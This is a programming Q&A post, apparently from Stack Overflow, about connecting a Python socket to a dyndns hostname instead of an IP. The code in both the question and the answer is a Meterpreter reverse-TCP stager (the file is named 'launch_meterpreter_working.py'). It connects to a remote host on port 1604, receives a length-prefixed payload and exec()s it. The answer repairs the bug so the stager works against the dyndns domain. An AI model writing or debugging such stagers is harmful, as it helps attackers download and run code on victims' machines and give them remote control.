# how can i struct.unpack use domain name in place of ip in socket.connect remotely

Tags: python, sockets, static, dns, ip

I have the following code, when i use it using an the external ip directly it works just fine but when i change the ip to a domain provided by dyndns it fails and throws the error listed below.

```
import socket,struct

# Connect with hostname
# dgts = socket.gethostbyname('chxxxmaz.dyndns.biz')
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.connect(("'" + dgts + "'", 1604))

# Connect with IP
s = socket.socket(2, 1)
s.connect(('197.xxx.xxx.45', 1604))

# Receive data
l = struct.unpack('>I', s.recv(4))[0]
d = s.recv(4096)
while len(d) != l:
    d += s.recv(4096)

exec(d, {'s': s})
```

The error message:

```
Traceback (most recent call last):
      File "/home/elite/Desktop/launch_meterpreter_working.py", line 8, in <module>
        l=struct.unpack('>I',s.recv(4))[0]
    error: unpack requires a string argument of length 4
```

Answer (score 0):

There is no need to manually resolve the hostname, you can simply use it when connecting the socket.

Your problem comes from the quotes that you add when you connect (why `"'" + dgts + "'"`?)

```
import socket, struct

# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('chxxxmaz.dyndns.biz', 1604))

# Receive data
l = struct.unpack('>I', s.recv(4))[0]
d = s.recv(4096)
while len(d) != l:
    d += s.recv(4096)

exec(d, {'s': s})
```

Comment: sorry php background, thank you for the quick response, let me try it